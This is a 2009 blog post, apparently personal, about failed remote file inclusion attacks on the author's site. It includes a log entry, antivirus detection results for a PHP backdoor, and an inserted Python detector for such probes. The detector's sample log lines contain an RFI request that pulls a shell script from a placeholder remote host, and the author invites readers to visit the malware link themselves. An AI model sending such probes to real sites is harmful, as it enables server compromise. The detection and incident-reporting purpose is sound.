Hacking Attempt Today via FoxReality

Multiple Attempts to Drop Trojan on This Website Failed

These are the Wassup details of the attack

69.65.41.165 2009-06-13 10:48:00

  • User Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
  • OS: WinVista
  • BROWSER: IE 7

As you can see, SERVER[DOCUMENT ROOT]= is part of PHP code, and they've attempted to change my domain root to that of http://web.archive.org/web/20130611185214/https://www.foxreality.com/, which is part of Rupert Murdoch's empire.

NOD32 NAC Trojan
NOD32 NAC Trojan

The hyperlinks above don't work as the code failed. However, if you are brave, strip out the first bit and just go to as I did, and hopefully your anti-virus or browser will kick in with a malware warning like mine did! The malware is identified as a Trojan by my NOD32 anti-virus software as PHP/Small.NAC trojan.
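The request above is a classic remote file inclusion (RFI) probe: a PHP variable in the query string is set to an absolute URL on another host, hoping the script will include it. The detector below is an added example, not code from the original post; it scans constructed Apache combined-log lines (the source IP is the one the post reports, remote-host.example and www.example.com are placeholders) and flags any query parameter whose value is a URL pointing off-site, including the URL-encoded form.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed log lines (not from the original post). Line 1 mirrors the
# reported attack; the trailing "??" is a common RFI idiom that turns anything
# the vulnerable script appends into a harmless query string for the remote host.
SAMPLE_LOG = """\
69.65.41.165 - - [13/Jun/2009:10:48:00 +0100] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://remote-host.example/shell.txt?? HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
203.0.113.7 - - [13/Jun/2009:10:49:10 +0100] "GET /wp-content/themes/x/index.php?page=http%3A%2F%2Fremote-host.example%2Fshell.txt%3F HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.4 - - [13/Jun/2009:10:50:00 +0100] "GET /?s=http://www.example.com/ HTTP/1.1" 200 1024 "http://www.example.com/" "Mozilla/5.0"
198.51.100.9 - - [13/Jun/2009:10:50:30 +0100] "GET /about/?ref=newsletter HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache combined log: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r"^(https?|ftps?)://", re.I)


def rfi_hits(log_text, own_host="www.example.com"):
    """Return (client_ip, param_name, url) for each query value that is an
    absolute URL on a host other than our own (the RFI indicator)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # parse_qsl decodes once; second pass catches double encoding
            if not SCHEME_RE.match(value):
                continue
            host = (urlsplit(value).hostname or "").lower()
            if host and host != own_host.lower():
                hits.append((m.group("ip"), name, value))
    return hits


if __name__ == "__main__":
    for ip, param, url in rfi_hits(SAMPLE_LOG):
        print(f"RFI probe from {ip}: {param}={url}")
```

Links to our own host (the third line, a site search) are ignored, so only the two probes are reported; feed real access logs through the same function to decide which source addresses to block.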

Conclusion

Someone has dumped a piece of malware on the Fox network and is now going round blogs and other websites to get them to point to the trojan and thus spread the nefarious package. It just needs one click!

As I type this, at 2009-06-13 10:51:43, I had two more attacks!!! That's nine in the last few minutes.
Checking the web for references, I’ve found this Russian webpage where the trojan has been tested against various antivirus programs – about half don’t detect it and it’s from the end of May this year! See link, translated into English.

This is their test:

File test.txt received 2009.05.27 20:52:02 (UTC)
Current status: finished
Result: 16/40 (40%)
Quote:
Antivirus Version Update Result
a-squared 4.0.0.101 2009.05.27 Backdoor.PHP.Small.o!IK
AhnLab-V3 5.0.0.2 2009.05.27 HTML/Xema
AntiVir 7.9.0.168 2009.05.27 BDS/PHP.ali.1
Antiy-AVL 2.0.3.1 2009.05.27 –
Authentium 5.1.2.4 2009.05.27 –
Avast 4.8.1335.0 2009.05.27 –
AVG 8.5.0.339 2009.05.27 BackDoor.Generic_c.BTI
BitDefender 7.2 2009.05.27 Backdoor.PHP.ALI
CAT-QuickHeal 10.00 2009.05.27 –
ClamAV 0.94.1 2009.05.27 PHP.Shell-23
Comodo 1207 2009.05.27 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.27 –
eSafe 7.0.17.0 2009.05.27 –
eTrust-Vet 31.6.6524 2009.05.27 –
F-Prot 4.4.4.56 2009.05.27 –
F-Secure 8.0.14470.0 2009.05.27 Exploit:PHP/Preamble.A
Fortinet 3.117.0.0 2009.05.27 –
GData 19 2009.05.27 Backdoor.PHP.ALI
Ikarus T3.1.1.57.0 2009.05.27 –
K7AntiVirus 7.10.746 2009.05.27 –
Kaspersky 7.0.0.125 2009.05.27 –
McAfee 5628 2009.05.27 –
McAfee+Artemis 5628 2009.05.27 –
McAfee-GW-Edition 6.7.6 2009.05.27 Trojan.Backdoor.PHP.ali.1
Microsoft 1.4701 2009.05.27 –
NOD32 4109 2009.05.27 PHP/Small.NAC
Norman 6.01.05 2009.05.27 –
nProtect 2009.1.8.0 2009.05.27 Backdoor.PHP.ALI
Panda 10.0.0.14 2009.05.27 –
PCTools 4.4.2.0 2009.05.21 PHP.ShellBot.M
Prevx 3.0 2009.05.27 –
Rising 21.31.21.00 2009.05.27 –
Sophos 4.42.0 2009.05.27 Troj/PHPBdoor-A
Sunbelt 3.2.1858.2 2009.05.27 –
Symantec 1.4.4.12 2009.05.27 –
TheHacker 6.3.4.3.332 2009.05.26 –
TrendMicro 8.950.0.1092 2009.05.27 –
VBA32 3.12.10.6 2009.05.27 Backdoor.PHP.Small.o
ViRobot 2009.5.27.1757 2009.05.27 –
VirusBuster 4.6.5.0 2009.05.27 PHP.ShellBot.M
Additional Information
File size: 1165 bytes
MD5...: f1a9b4e4b207cd38641061e1b72d4775
SHA1..: 33c02179e53c19e00897fb0c63501acc0a2233e8
SHA256: 0b3eef46d7111939962db133d2e75530fbb7946d92a33195ca6b7f2e1affe43a
ssdeep: 24:kwauoGPmXvuH6dcFTGPmXvuH6dc4H6dcZ1Mpn6+YvKsLKPXVwuHENNTh:bBoCgMQsCgMQfQu1M5XW0SNl
PEiD..: -
TrID..: File type identification: HyperText Markup Language (100.0%)
PEInfo: -
PDFiD.: -
RDS...: NSRL Reference Data Set

Needless to say I've blocked the source IP address now. It was from GigeNET in Illinois, and they've been told!

By Strangely

Founding member of the gifted & talented band, "The Crawling Chaos" from the North-East of England.

3 comments

    1. Actually, if you check the text file without ?? marks, it looks like the script tries to read your hard drive’s contents:

      ========== “systrojan” below ========

      SysTrojan
      Wrong Place

      1. Yes, I just checked. It’s still there – you’d think Fox would do something about it!

        I tried without the ?? as you suggested but it’s just the same message with my AV as before. It blocks it super-fast before anything else happens…

        What time did you get your hits? Was it the same sort of time as me or has it just happened?
